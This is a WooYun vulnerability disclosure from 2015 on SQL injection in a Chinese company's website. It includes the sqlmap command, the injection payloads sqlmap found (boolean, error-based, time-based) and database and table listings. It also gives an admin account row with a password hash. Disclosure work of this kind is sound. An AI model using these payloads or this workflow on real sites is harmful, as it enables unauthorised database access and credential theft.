当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163270

漏洞标题:信太科技主站存在sql注入漏洞

相关厂商:信太科技(集团)有限公司

漏洞作者: 白虹饮涧

提交时间:2015-12-22 14:14

修复时间:2016-02-09 23:23

公开时间:2016-02-09 23:23

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:1

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-22: 细节已通知厂商并且等待厂商处理中
2015-12-26: 厂商已经确认,细节仅向厂商公开
2016-01-05: 细节向核心白帽子及相关领域专家公开
2016-01-15: 细节向普通白帽子公开
2016-01-25: 细节向实习白帽子公开
2016-02-09: 细节向公众公开

简要描述:

厂子不大,危害较低(几乎没有),不过希望可以获得一个乌云的邀请码^_^

详细说明:

010.png


Google Dorks寻找注入点。
网址:http://**.**.**.**/file_title.php?weblan=g&in_title_id=123

020.png


一个‘ 就暴露了mysql 应该可以注入了。

sqlmap -u 'http://**.**.**.**/file_title.php?weblan=g&in_title_id=123' --dbms=Mysql -p in_title_id


sqlmap 结果

003.png


数据库和表

005.png


超级管理员密码都没设置,还是admin,哎。

id,IP,PWD,SEX,POST,STATE,PHONE,EMAIL,MOBILE,USERNAME,TRUENAME,logintime,LOGINCOUNT,ONLINE_STATE
3,**.**.**.**,1d32be692f7597437161d710795000d6,0,<blank>,0,<blank>,<blank>,NULL,admin,超级管理员,2013-03-21 13:42:24,1418,1

漏洞证明:

sqlmap identified the following injection point(s) with a total of 49 HTTP(s) requests:
---
Parameter: in_title_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: weblan=g&in_title_id=123' AND 5400=5400 AND 'iAlc'='iAlc
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: weblan=g&in_title_id=123' AND (SELECT 1220 FROM(SELECT COUNT(*),CONCAT(0x7171767871,(SELECT (ELT(1220=1220,1))),0x717a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'LXSv'='LXSv
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: weblan=g&in_title_id=123' AND (SELECT * FROM (SELECT(SLEEP(5)))RTcm) AND 'iavy'='iavy
---
web application technology: Apache
back-end DBMS: MySQL 5.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: in_title_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: weblan=g&in_title_id=123' AND 5400=5400 AND 'iAlc'='iAlc
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: weblan=g&in_title_id=123' AND (SELECT 1220 FROM(SELECT COUNT(*),CONCAT(0x7171767871,(SELECT (ELT(1220=1220,1))),0x717a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'LXSv'='LXSv
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: weblan=g&in_title_id=123' AND (SELECT * FROM (SELECT(SLEEP(5)))RTcm) AND 'iavy'='iavy
---
web application technology: Apache
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] test
[*] zp80d1_db
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: in_title_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: weblan=g&in_title_id=123' AND 5400=5400 AND 'iAlc'='iAlc
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: weblan=g&in_title_id=123' AND (SELECT 1220 FROM(SELECT COUNT(*),CONCAT(0x7171767871,(SELECT (ELT(1220=1220,1))),0x717a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'LXSv'='LXSv
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: weblan=g&in_title_id=123' AND (SELECT * FROM (SELECT(SLEEP(5)))RTcm) AND 'iavy'='iavy
---
web application technology: Apache
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] test
[*] zp80d1_db
Database: test
[6 tables]
+---------------------------------------+
| t_contry                              |
| t_info                                |
| t_keyword                             |
| t_menu                                |
| t_topic                               |
| t_user                                |
+---------------------------------------+
Database: zp80d1_db
[49 tables]
+---------------------------------------+
| user                                  |
| sz21_admin_level                      |
| sz21_admin_log                        |
| sz21_board                            |
| sz21_board_eng                        |
| sz21_count                            |
| sz21_count_eng                        |
| sz21_download_file                    |
| sz21_download_file_eng                |
| sz21_download_type                    |
| sz21_download_type_eng                |
| sz21_fcomment                         |
| sz21_fcomment_eng                     |
| sz21_file_zt                          |
| sz21_file_zt_eng                      |
| sz21_guonggao                         |
| sz21_guonggao_eng                     |
| sz21_link                             |
| sz21_link_eng                         |
| sz21_order                            |
| sz21_order_detail                     |
| sz21_order_detail_eng                 |
| sz21_order_eng                        |
| sz21_parameter                        |
| sz21_parameter_eng                    |
| sz21_paratype                         |
| sz21_paratype_eng                     |
| sz21_producer                         |
| sz21_producereng                      |
| sz21_product                          |
| sz21_product_eng                      |
| sz21_propara                          |
| sz21_propara_eng                      |
| sz21_protype2                         |
| sz21_protype2_eng                     |
| sz21_ptype                            |
| sz21_ptype_eng                        |
| sz21_put_producer                     |
| sz21_put_producer_eng                 |
| sz21_putpro                           |
| sz21_putpro_eng                       |
| sz21_site                             |
| sz21_site_eng                         |
| sz21_title                            |
| sz21_title_ceng                       |
| sz21_title_con                        |
| sz21_title_eng                        |
| sz21_web_ad                           |
| sz21_web_ad_eng                       |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

修复方案:

过滤
网站大部分区域都可注入= =。

版权声明:转载请注明来源 白虹饮涧@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-12-26 23:33

厂商回复:

CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无

漏洞评价:

评价